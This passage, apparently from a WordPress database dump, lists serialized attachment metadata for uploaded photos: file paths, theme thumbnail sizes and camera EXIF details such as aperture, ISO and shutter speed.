bile\";a:4:{s:4:\"file\";s:19:\"Store2e-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"Store2e-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"Store2e-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:19:\"Store2e-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:19:\"Store2e-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:19:\"Store2e-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:19:\"Store2e-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(432,169,'_wp_attached_file','2016/03/DSCN3601.jpg'),(433,169,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN3601.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3601-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3601-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3601-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3601-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3601-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3601-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3601-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3601-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3601-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3601-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3601-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3601-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1465970329\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00443066016837\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(434,170,'_wp_attached_file','2016/03/DSCN3611.jpg'),(435,170,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN3611.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3611-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3611-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3611-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3611-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3611-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3611-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3611-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3611-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3611-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3611-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3611-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3611-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1466059215\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00466417910448\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(436,171,'_wp_attached_file','2016/03/IMG_20160529_165358_102.jpg'),(437,171,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1840;s:6:\"height\";i:3264;s:4:\"file\";s:35:\"2016/03/IMG_20160529_165358_102.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_20160529_165358_102-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"IMG_20160529_165358_102-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"IMG_20160529_165358_102-768x1362.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1362;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"IMG_20160529_165358_102-577x1024.jpg\";s:5:\"width\";i:577;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:35:\"IMG_20160529_165358_102-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:35:\"IMG_20160529_165358_102-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_20160529_165358_102-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:36:\"IMG_20160529_165358_102-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:35:\"IMG_20160529_165358_102-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:35:\"IMG_20160529_165358_102-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:35:\"IMG_20160529_165358_102-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:35:\"IMG_20160529_165358_102-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DROID RAZR\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:8:\"0.001103\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(438,172,'_wp_attached_file','2016/03/IMG_4252.jpg'),(439,172,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4032;s:6:\"height\";i:3024;s:4:\"file\";s:20:\"2016/03/IMG_4252.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_4252-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_4252-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_4252-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_4252-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"IMG_4252-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"IMG_4252-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_4252-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"IMG_4252-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"IMG_4252-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"IMG_4252-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"IMG_4252-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"IMG_4252-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"iPhone 6s Plus\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1465768499\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:6:\"0.0625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(440,174,'_wp_attached_file','2016/03/DSCN3100.jpg'),(441,174,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN3100.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3100-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3100-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3100-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3100-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3100-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3100-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3100-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3100-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3100-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3100-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3100-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3100-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1444975342\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"37.7\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0040899795501\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(442,175,'_wp_attached_file','2016/03/DSCN3074.jpg'),(443,175,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN3074.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3074-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3074-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3074-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3074-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3074-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3074-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3074-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3074-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3074-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3074-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3074-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3074-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1443335678\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"11.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00480307396734\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(444,176,'_wp_attached_file','2016/03/DSCN2605.jpg'),(445,176,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN2605.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2605-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2605-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2605-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2605-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2605-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2605-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2605-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2605-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2605-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2605-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2605-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2605-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1432974898\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"202\";s:13:\"shutter_speed\";s:15:\"0.0333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(448,180,'_wp_attached_file','2016/03/DSCN2735.jpg'),(449,180,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN2735.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2735-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2735-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2735-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2735-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2735-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2735-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2735-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2735-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2735-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2735-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2735-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2735-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1436937283\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0131926121372\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(450,181,'_wp_attached_file','2016/03/DSCN2974.jpg'),(451,181,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN2974.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2974-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2974-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2974-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2974-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN